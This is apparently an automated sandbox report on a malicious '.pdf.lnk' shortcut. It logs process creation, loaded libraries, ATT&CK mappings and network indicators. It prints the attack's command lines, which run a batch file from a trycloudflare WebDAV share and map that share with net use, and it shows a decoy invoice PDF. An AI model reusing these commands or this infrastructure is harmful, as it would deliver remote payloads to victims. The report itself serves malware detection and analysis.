Source: C:\Windows\System32\cscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c \\typically-nut-personalized-syndication.trycloudflare.com@SSL\DavWWWRoot\xo.bat
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://www.healyconsultants.com/wp-content/uploads/2013/08/draft-invoice-Germany.pdf
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net use Z: "\\nissan-signature-rs-noise.trycloudflare.com@SSL\DavWWWRoot" /user:your-username your-password /persistent:no
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2016,i,15765900008559282355,18116320672109493881,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version=20250306-183004.429000 --mojo-platform-channel-handle=2032 /prefetch:3
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net use Z: /delete /yes
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cscript.exe cscript "C:\Users\user\AppData\Local\Temp\coi.wsf"Jump to behavior
Source: C:\Windows\System32\cscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c \\typically-nut-personalized-syndication.trycloudflare.com@SSL\DavWWWRoot\xo.batJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://www.healyconsultants.com/wp-content/uploads/2013/08/draft-invoice-Germany.pdfJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net use Z: "\\nissan-signature-rs-noise.trycloudflare.com@SSL\DavWWWRoot" /user:your-username your-password /persistent:noJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net use Z: /delete /yesJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2016,i,15765900008559282355,18116320672109493881,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version=20250306-183004.429000 --mojo-platform-channel-handle=2032 /prefetch:3Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cscript.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\cscript.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\cscript.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\cscript.exeSection loaded: sxs.dllJump to behavior
Source: C:\Windows\System32\cscript.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\cscript.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\cscript.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\cscript.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\cscript.exeSection loaded: scrobj.dllJump to behavior
Source: C:\Windows\System32\cscript.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\cscript.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\cscript.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\cscript.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\cscript.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\cscript.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\cscript.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\cscript.exeSection loaded: jscript.dllJump to behavior
Source: C:\Windows\System32\cscript.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\cscript.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\cscript.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\cscript.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\System32\cscript.exeSection loaded: scrrun.dllJump to behavior
Source: C:\Windows\System32\cscript.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\cscript.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\cscript.exeSection loaded: edputil.dllJump to behavior
Source: C:\Windows\System32\cscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
Source: C:\Windows\System32\cscript.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\cscript.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\cscript.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Windows\System32\cscript.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Windows\System32\cscript.exeSection loaded: slc.dllJump to behavior
Source: C:\Windows\System32\cscript.exeSection loaded: sppc.dllJump to behavior
Source: C:\Windows\System32\cscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\System32\cscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: windows.shell.servicehostbuilder.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: ieframe.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: netapi32.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: wkscli.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: windows.staterepositoryps.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: edputil.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: mlang.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: policymanager.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: msvcp110_win.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: pcacli.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: sfc_os.dllJump to behavior
Source: C:\Windows\System32\net.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\System32\net.exeSection loaded: wkscli.dllJump to behavior
Source: C:\Windows\System32\net.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\net.exeSection loaded: samcli.dllJump to behavior
Source: C:\Windows\System32\net.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\net.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\net.exeSection loaded: drprov.dllJump to behavior
Source: C:\Windows\System32\net.exeSection loaded: winsta.dllJump to behavior
Source: C:\Windows\System32\net.exeSection loaded: ntlanman.dllJump to behavior
Source: C:\Windows\System32\net.exeSection loaded: davclnt.dllJump to behavior
Source: C:\Windows\System32\net.exeSection loaded: davhlpr.dllJump to behavior
Source: C:\Windows\System32\net.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\net.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Windows\System32\net.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\net.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\System32\net.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\net.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\net.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\net.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\net.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\net.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\net.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\net.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\net.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\net.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\net.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\System32\net.exeSection loaded: wkscli.dllJump to behavior
Source: C:\Windows\System32\net.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\net.exeSection loaded: samcli.dllJump to behavior
Source: C:\Windows\System32\net.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\net.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\cscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{06290BD0-48AA-11D2-8432-006008C3FBFC}\InprocServer32Jump to behavior
Source: DE-10192.pdf.lnk.download.lnkLNK file: ..\..\..\..\Windows\System32\cmd.exe
Source: Window RecorderWindow detected: More than 3 window changes detected

Persistence and Installation Behavior

barindex
Source: LNK fileProcess created: C:\Windows\System32\cmd.exe
Source: LNK fileProcess created: C:\Windows\System32\cmd.exe
Source: LNK fileProcess created: C:\Windows\System32\cmd.exeJump to behavior

Hooking and other Techniques for Hiding and Protection

barindex
Source: Possible double extension: pdf.lnkStatic PE information: DE-10192.pdf.lnk.download.lnk
Source: C:\Windows\System32\cscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\cscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\cscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: net.exe, 00000014.00000002.1436671895.000001E265721000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cscript.exe cscript "C:\Users\user\AppData\Local\Temp\coi.wsf"Jump to behavior
Source: C:\Windows\System32\cscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c \\typically-nut-personalized-syndication.trycloudflare.com@SSL\DavWWWRoot\xo.batJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://www.healyconsultants.com/wp-content/uploads/2013/08/draft-invoice-Germany.pdfJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net use Z: "\\nissan-signature-rs-noise.trycloudflare.com@SSL\DavWWWRoot" /user:your-username your-password /persistent:noJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net use Z: /delete /yesJump to behavior
Source: C:\Windows\System32\cscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

Stealing of Sensitive Information

barindex
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net use Z: "\\nissan-signature-rs-noise.trycloudflare.com@SSL\DavWWWRoot" /user:your-username your-password /persistent:no
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net use Z: /delete /yes
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net use Z: "\\nissan-signature-rs-noise.trycloudflare.com@SSL\DavWWWRoot" /user:your-username your-password /persistent:noJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net use Z: /delete /yesJump to behavior
Source: C:\Windows\System32\cmd.exeFile opened: \\typically-nut-personalized-syndication.trycloudflare.com@SSL\DavWWWRoot\coi.wsfJump to behavior
Source: C:\Windows\System32\cmd.exeFile opened: \\typically-nut-personalized-syndication.trycloudflare.com@SSL\DavWWWRoot\coi.wsfJump to behavior
Source: C:\Windows\System32\cmd.exeFile opened: \\typically-nut-personalized-syndication.trycloudflare.com@SSL\DavWWWRoot\Jump to behavior
Source: C:\Windows\System32\cmd.exeFile opened: \\typically-nut-personalized-syndication.trycloudflare.com@SSL\DavWWWRoot\Jump to behavior
Source: C:\Windows\System32\cmd.exeFile opened: \\typically-nut-personalized-syndication.trycloudflare.com@SSL\DavWWWRoot\xo.batJump to behavior
Source: C:\Windows\System32\cmd.exeFile opened: \\typically-nut-personalized-syndication.trycloudflare.com@SSL\DavWWWRoot\xo.batJump to behavior
Source: C:\Windows\System32\cmd.exeFile opened: \\typically-nut-personalized-syndication.trycloudflare.com@SSL\DavWWWRoot\xo.batJump to behavior
Source: C:\Windows\System32\cmd.exeFile opened: \\typically-nut-personalized-syndication.trycloudflare.com@SSL\DavWWWRoot\xo.batJump to behavior
Source: C:\Windows\System32\cmd.exeFile opened: \\typically-nut-personalized-syndication.trycloudflare.com@SSL\DavWWWRoot\xo.batJump to behavior
Source: C:\Windows\System32\cmd.exeFile opened: \\typically-nut-personalized-syndication.trycloudflare.com@SSL\DavWWWRoot\xo.batJump to behavior
Source: C:\Windows\System32\cmd.exeFile opened: \\typically-nut-personalized-syndication.trycloudflare.com@SSL\DavWWWRoot\xo.batJump to behavior
Source: C:\Windows\System32\cmd.exeFile opened: \\typically-nut-personalized-syndication.trycloudflare.com@SSL\DavWWWRoot\xo.batJump to behavior
Source: C:\Windows\System32\cmd.exeFile opened: \\typically-nut-personalized-syndication.trycloudflare.com@SSL\DavWWWRoot\xo.batJump to behavior
Source: C:\Windows\System32\cmd.exeFile opened: \\typically-nut-personalized-syndication.trycloudflare.com@SSL\DavWWWRoot\xo.batJump to behavior
Source: C:\Windows\System32\cmd.exeFile opened: \\typically-nut-personalized-syndication.trycloudflare.com@SSL\DavWWWRoot\xo.batJump to behavior
Source: C:\Windows\System32\cmd.exeFile opened: \\typically-nut-personalized-syndication.trycloudflare.com@SSL\DavWWWRoot\xo.batJump to behavior
Source: C:\Windows\System32\cmd.exeFile opened: \\typically-nut-personalized-syndication.trycloudflare.com@SSL\DavWWWRoot\xo.batJump to behavior
Source: C:\Windows\System32\cmd.exeFile opened: \\typically-nut-personalized-syndication.trycloudflare.com@SSL\DavWWWRoot\xo.batJump to behavior
Source: C:\Windows\System32\cmd.exeFile opened: \\typically-nut-personalized-syndication.trycloudflare.com@SSL\DavWWWRoot\xo.batJump to behavior
Source: C:\Windows\System32\cmd.exeFile opened: \\typically-nut-personalized-syndication.trycloudflare.com@SSL\DavWWWRoot\xo.batJump to behavior
Source: C:\Windows\System32\cmd.exeFile opened: \\typically-nut-personalized-syndication.trycloudflare.com@SSL\DavWWWRoot\xo.batJump to behavior
Source: C:\Windows\System32\cmd.exeFile opened: \\typically-nut-personalized-syndication.trycloudflare.com@SSL\DavWWWRoot\xo.batJump to behavior
Source: C:\Windows\System32\cmd.exeFile opened: \\typically-nut-personalized-syndication.trycloudflare.com@SSL\DavWWWRoot\xo.batJump to behavior
Source: C:\Windows\System32\cmd.exeFile opened: \\typically-nut-personalized-syndication.trycloudflare.com@SSL\DavWWWRoot\Jump to behavior
Source: C:\Windows\System32\cmd.exeFile opened: \\typically-nut-personalized-syndication.trycloudflare.com@SSL\DavWWWRoot\Jump to behavior
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity Information1
Scripting
Valid AccountsWindows Management Instrumentation1
Scripting
11
Process Injection
111
Masquerading
OS Credential Dumping2
Network Share Discovery
Remote ServicesData from Local System1
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/Job1
DLL Side-Loading
1
DLL Side-Loading
11
Process Injection
LSASS Memory1
Security Software Discovery
Remote Desktop ProtocolData from Removable Media3
Ingress Tool Transfer
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
Obfuscated Files or Information
Security Account Manager1
Process Discovery
SMB/Windows Admin SharesData from Network Shared Drive3
Non-Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
DLL Side-Loading
NTDS1
File and Directory Discovery
Distributed Component Object ModelInput Capture4
Application Layer Protocol
Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
File Deletion
LSA Secrets2
System Information Discovery
SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1637112 Sample: DE-10192.pdf.lnk.download.lnk Startdate: 13/03/2025 Architecture: WINDOWS Score: 92 36 www.google.com 2->36 38 50.23.12.20.in-addr.arpa 2->38 52 Suricata IDS alerts for network traffic 2->52 54 Windows shortcut file (LNK) starts blacklisted processes 2->54 56 Multi AV Scanner detection for submitted file 2->56 58 5 other signatures 2->58 10 cmd.exe 2 2->10         started        signatures3 process4 file5 34 C:\Users\user\AppData\Local\Temp\coi.wsf, XML 10->34 dropped 64 Opens network shares 10->64 66 Gathers information about network shares 10->66 14 cscript.exe 1 2 10->14         started        17 conhost.exe 1 10->17         started        signatures6 process7 signatures8 68 Windows shortcut file (LNK) starts blacklisted processes 14->68 19 cmd.exe 14 14->19         started        process9 signatures10 60 Opens network shares 19->60 62 Gathers information about network shares 19->62 22 chrome.exe 2 19->22         started        25 net.exe 7 19->25         started        27 conhost.exe 19->27         started        29 net.exe 1 19->29         started        process11 dnsIp12 40 192.168.2.10, 138, 443, 49674 unknown unknown 22->40 42 192.168.2.4 unknown unknown 22->42 44 192.168.2.6 unknown unknown 22->44 31 chrome.exe 22->31         started        process13 dnsIp14 46 www.google.com 142.250.184.196, 443, 52738, 53128 GOOGLEUS United States 31->46 48 healyconsultants.com 162.159.134.42, 443, 53111, 53114 CLOUDFLARENETUS United States 31->48 50 www.healyconsultants.com 31->50

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
DE-10192.pdf.lnk.download.lnk11%VirustotalBrowse
DE-10192.pdf.lnk.download.lnk13%ReversingLabs
No Antivirus matches
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
https://www.healyconsultants.com/favicon.ico0%Avira URL Cloudsafe
https://nissan-signature-rs-noise.trycloudflare.com/0%Avira URL Cloudsafe
https://typically-nut-personalized-syndication.trycloudflare.com/xo.bat0%Avira URL Cloudsafe
https://www.healyconsultants.com/wp-content/uploads/2013/08/draft-invoice-Germany.pdfPROCESSOR_ARCHI0%Avira URL Cloudsafe
https://nissan-signature-rs-noise.trycloudflare.com/ttings0%Avira URL Cloudsafe
https://nissan-signature-rs-noise.trycloudflare.com/ue0%Avira URL Cloudsafe
https://typically-nut-personalized-syndication.trycloudflare.com/coi.wsf0%Avira URL Cloudsafe
https://nissan-signature-rs-noise.trycloudflare.com/O#yX0%Avira URL Cloudsafe
NameIPActiveMaliciousAntivirus DetectionReputation
healyconsultants.com
162.159.134.42
truefalse
    unknown
    www.google.com
    142.250.184.196
    truefalse
      high
      www.healyconsultants.com
      unknown
      unknownfalse
        high
        50.23.12.20.in-addr.arpa
        unknown
        unknownfalse
          high
          NameMaliciousAntivirus DetectionReputation
          https://typically-nut-personalized-syndication.trycloudflare.com/xo.battrue
          • Avira URL Cloud: safe
          unknown
          https://typically-nut-personalized-syndication.trycloudflare.com/coi.wsftrue
          • Avira URL Cloud: safe
          unknown
          https://www.healyconsultants.com/wp-content/uploads/2013/08/draft-invoice-Germany.pdffalse
            unknown
            https://www.healyconsultants.com/favicon.icofalse
            • Avira URL Cloud: safe
            unknown
            NameSourceMaliciousAntivirus DetectionReputation
            https://nissan-signature-rs-noise.trycloudflare.com/net.exe, 00000014.00000002.1436671895.000001E265721000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            https://www.healyconsultants.com/wp-content/uploads/2013/08/draft-invoice-Germany.pdfPROCESSOR_ARCHInet.exe, 00000014.00000002.1436912928.000001E2659F4000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000014.00000002.1436671895.000001E265710000.00000004.00000020.00020000.00000000.sdmp, net.exe, 0000001B.00000002.1492189178.000002220A090000.00000004.00000020.00020000.00000000.sdmp, net.exe, 0000001B.00000002.1492228185.000002220A374000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            https://nissan-signature-rs-noise.trycloudflare.com/uenet.exe, 00000014.00000002.1436671895.000001E265721000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            https://nissan-signature-rs-noise.trycloudflare.com/O#yXnet.exe, 00000014.00000002.1436671895.000001E265721000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            https://nissan-signature-rs-noise.trycloudflare.com/ttingsnet.exe, 00000014.00000002.1436671895.000001E265721000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            • No. of IPs < 25%
            • 25% < No. of IPs < 50%
            • 50% < No. of IPs < 75%
            • 75% < No. of IPs
            IPDomainCountryFlagASNASN NameMalicious
            142.250.184.196
            www.google.comUnited States
            15169GOOGLEUSfalse
            162.159.134.42
            healyconsultants.comUnited States
            13335CLOUDFLARENETUSfalse
            IP
            192.168.2.4
            192.168.2.6
            192.168.2.10
            Joe Sandbox version:42.0.0 Malachite
            Analysis ID:1637112
            Start date and time:2025-03-13 11:06:17 +01:00
            Joe Sandbox product:CloudBasic
            Overall analysis duration:0h 4m 58s
            Hypervisor based Inspection enabled:false
            Report type:full
            Cookbook file name:default.jbs
            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
            Number of analysed new started processes analysed:30
            Number of new started drivers analysed:1
            Number of existing processes analysed:0
            Number of existing drivers analysed:0
            Number of injected processes analysed:0
            Technologies:
            • HCA enabled
            • EGA enabled
            • AMSI enabled
            Analysis Mode:default
            Analysis stop reason:Timeout
            Sample name:DE-10192.pdf.lnk.download.lnk
            Detection:MAL
            Classification:mal92.spyw.evad.winLNK@30/6@6/5
            EGA Information:Failed
            HCA Information:
            • Successful, ratio: 100%
            • Number of executed functions: 0
            • Number of non-executed functions: 0
            Cookbook Comments:
            • Found application associated with file extension: .lnk
            • Exclude process from analysis (whitelisted): MpCmdRun.exe, mrxdav.sys, dllhost.exe, rundll32.exe, sppsvc.exe, WMIADAP.exe, SIHClient.exe, Sgrmuserer.exe, conhost.exe, svchost.exe
            • Excluded IPs from analysis (whitelisted): 2.16.164.57, 142.250.185.206, 216.58.206.67, 66.102.1.84, 172.217.18.14, 142.250.186.174, 216.58.206.46, 142.250.185.110, 142.250.74.206, 142.251.40.206, 74.125.7.136, 142.250.185.174, 172.217.16.195, 216.58.212.131, 142.250.186.99, 216.58.212.142, 23.199.214.10, 20.12.23.50, 13.85.23.206, 20.109.210.53
            • Excluded domains from analysis (whitelisted): clients1.google.com, fs.microsoft.com, accounts.google.com, slscr.update.microsoft.com, typically-nut-personalized-syndication.trycloudflare.com, ctldl.windowsupdate.com, nissan-signature-rs-noise.trycloudflare.com, clientservices.googleapis.com, r3---sn-hp57yns7.gvt1.com, fe3cr.delivery.mp.microsoft.com, clients2.google.com, edgedl.me.gvt1.com, redirector.gvt1.com, r3.sn-hp57yns7.gvt1.com, update.googleapis.com, clients.l.google.com, c.pki.goog
            • Not all processes where analyzed, report is missing behavior information
            • Report size getting too big, too many NtOpenFile calls found.
            • Report size getting too big, too many NtOpenKeyEx calls found.
            • Report size getting too big, too many NtProtectVirtualMemory calls found.
            • Report size getting too big, too many NtQueryValueKey calls found.
            • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
            No simulations
            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
            162.159.134.42http://www.hoppestad.no/Get hashmaliciousUnknownBrowse
            • www.hoppestad.no/
            JeouiaPf03mHSBH.exeGet hashmaliciousFormBookBrowse
            • www.goodneighbor.club/rk1u/?Srs=F12hDm1e4DcVWImHJ+2qK+It/RbJLRPuehC1dypgSVIG0HNIZQ44LV2EHRnZDsdrBZ/sqOYHya/GlclbNDRcdimcV6EHMYCTSyL+JOmQWa2hH4hFNXMeP+g=&FX=9v8XFZ
            Hesap_Hareketleri_20-07-2024.exeGet hashmaliciousFormBookBrowse
            • www.goodneighbor.club/ua6w/?mt=JRT0JH&WRsp6Vo=VguSblgGE2gr11H1Oz6h6PWd6leymQOovKLAJAP7pFJ8CEff3rcgEuyXtoztwl+D0WsHUExksuBetSe4yiwXMKet7xpBLnDRm6RCyc0okkK0F26Usou9s5dt62QO+Z5203j3h16PZUV7
            Inquiry files v2.exeGet hashmaliciousFormBook, PureLog StealerBrowse
            • www.goodneighbor.club/qt04/
            nK1Y86mbzfbkwpB.exeGet hashmaliciousFormBook, PureLog StealerBrowse
            • www.goodneighbor.club/qt04/
            Petromasila 16072024.exeGet hashmaliciousFormBook, PureLog StealerBrowse
            • www.goodneighbor.club/arws/
            CC-CREDIT CARD-itineraries.exeGet hashmaliciousFormBookBrowse
            • www.goodneighbor.club/ua6w/?L0WX3=VguSblgGE2gr11HyBT7GooCC0H7LwBOovKLAJAP7pFJ8CEff3rcgEuyXtoztwl+D0WsHUExksuBetSe4yiwXPO2P1jxDbVWq76NrnMwukHi5CRjf6Y7B46k=&_4B=Rxm4iVs
            http://heritageconsultants.comGet hashmaliciousUnknownBrowse
            • heritageconsultants.com/
            http://www.heritageconsultants.com/Get hashmaliciousUnknownBrowse
            • www.heritageconsultants.com/
            http://www.standardmediaindex.comGet hashmaliciousUnknownBrowse
            • www.standardmediaindex.com/
            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
            CLOUDFLARENETUShttps://metamask-io-s--dk.webflow.ioGet hashmaliciousHTMLPhisherBrowse
            • 104.18.161.117
            https://started-ledgger.webflow.ioGet hashmaliciousHTMLPhisherBrowse
